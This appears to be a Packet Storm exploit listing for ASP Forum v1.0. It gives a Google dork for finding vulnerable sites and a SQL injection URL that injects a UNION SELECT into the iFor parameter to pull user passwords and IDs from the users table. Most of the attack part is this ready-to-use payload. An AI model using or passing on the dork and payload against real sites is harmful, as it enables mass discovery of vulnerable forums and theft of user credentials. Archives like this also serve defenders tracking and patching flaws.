ASP Forum version 1.0 suffers from a remote SQL injection vulnerability.
cf9fee0aac2baca2b13b87a4d1e99ea5a91cc9a6d08ff0ab042fcd438a3aa65d # Bl@ckbe@rD ('Tunisian TerrorisT') #
# ===================== #
-----------------------------------------------------------------------------------
[+] Script Name : Asp Forum v1.0 Rem0te SQL Injection EXploit
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT')
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr
[+] Home : http://www.underz0ne.org
[+] Dork : http://www.google.com
http://www.google.com/search?q=%22ASP+Forum+v1.0+-+Powered+by+GO4I.NET++-%22+++inurl:forums.asp%3FiFor%3D&
hl=fr&lr=&client=firefox-a&rls=org.mozilla:fr:official&hs=ELg&
filter=0
--//-->
[+] Expl0iT :
http://www.site.xx/forum/forum.asp?iFor={sql}
http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
--//-->
[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed